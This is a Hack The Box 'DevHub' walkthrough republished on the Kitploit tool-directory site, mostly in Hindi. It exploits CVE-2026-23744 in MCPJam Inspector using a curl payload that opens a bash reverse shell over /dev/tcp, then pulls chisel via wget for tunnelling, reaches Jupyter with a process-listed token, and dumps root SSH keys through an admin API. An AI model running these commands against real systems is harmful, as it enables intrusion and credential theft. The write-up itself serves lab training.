Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
DevHub-HTB-Walkthrough — Hack The Box - DevHub मशीन वॉकथ्रू (मध्यम Linux, CVE-2026-23744, Chisel Tunneling, Jupyter, रूट विशेषाधिकार वृद्धि) | Kitploit
उपकरण/GitHubGitHub/timgad794/devhub-htb-walkthrough
विशेषाधिकार वृद्धिटोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubtimgad794/devhub-htb-walkthrough

DevHub-HTB-Walkthrough

Hack The Box - DevHub मशीन वॉकथ्रू (मध्यम Linux, CVE-2026-23744, Chisel Tunneling, Jupyter, रूट विशेषाधिकार वृद्धि)

रिपॉजिटरी देखें
1 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

DevHub – HTB वॉकथ्रू (मध्यम लिनक्स)

मशीन: DevHub
कठिनाई: मध्यम
ऑपरेटिंग सिस्टम: Linux
विषय: CVE-2026-23744, चिसेल टनलिंग, ज्यूपिटर, Flask API, रूट विशेषाधिकार वृद्धि


📌 1. अन्वेषण

root@kitploit:~
nmap -sC -sV devhub.htb

परिणाम:

root@kitploit:~
पोर्ट 22 (SSH)

पोर्ट 80 (HTTP)

पोर्ट 6274 (MCPJam Inspector)

📌 2. Hosts फ़ाइल समायोजित करें

echo "10.x.x.x devhub.htb" >> /etc/hosts

📌 3. वेबसाइट का अन्वेषण करें

root@kitploit:~
http://devhub.htb/ → लैंडिंग पेज

http://devhub.htb:6274/ → MCPJam Inspector v1.4.2 (CVE-2026-23744 के लिए संवेदनशील)

📌 4. mcp-dev के रूप में रिवर्स शेल

टर्मिनल 1 – श्रोता:

nc -lvnp 4444

टर्मिनल 2 – पेलोड:

curl -X POST http://devhub.htb:6274/api/mcp/connect
-H "Content-Type: application/json"
-d '{"serverConfig":{"command":"bash","args":["-c","bash -i >& /dev/tcp/10.x.x.x/4444 0>&1"],"env":{}},"serverId":"mytest"}'

✅ mcp-dev के रूप में शेल 📌 5. चिसेल टनल स्थापित करें

HTTP सर्वर (हमलावर):

python3 -m http.server 8000 --bind 10.x.x.x

लक्ष्य पर चिसेल डाउनलोड करें (mcp-dev शेल):

cd /tmp wget http://10.x.x.x:8000/chisel chmod +x chisel

चिसेल सर्वर (हमलावर):

./chisel server --reverse --port 9001

चिसेल क्लाइंट (mcp-dev शेल):

./chisel client 10.x.x.x:9001 R:8888:127.0.0.1:8888 &

📌 6. ज्यूपिटर पहुँच

टोकन पढ़ें (mcp-dev शेल):

ps aux | grep jupyter | grep -v grep

टोकन: a7f3b2c9d8e1f4a5b6c7d8e9f0a1b2xxxxxxxxxx

ब्राउज़र: http://localhost:8888/?token=... 📌 7. रूट SSH कुंजी प्राप्त करें (ज्यूपिटर में)

import requests, json

url = "http://127.0.0.1:5000/tools/call" headers = {"X-API-Key": "opsmcp_secret_key_4f5a6b7xxxxxxxxx", "Content-Type": "application/json"} payload = {"name": "ops._admin_dump", "args": {"target": "ssh_keys", "confirm": True}}

response = requests.post(url, headers=headers, json=payload) print(json.dumps(response.json(), indent=2))

📌 8. रूट में लॉगिन करें

nano root_key

कुंजी डालें

chmod 600 root_key ssh -i root_key [email protected]

📌 9. फ़्लैग्स

cat /root/root.txt cat /home/analyst/user.txt

रूट फ़्लैग:

08be4cfb68597d0f9edfccxxxxxxxxxx

शुभकामनाएँ! 🚀

टूल डाउनलोड करें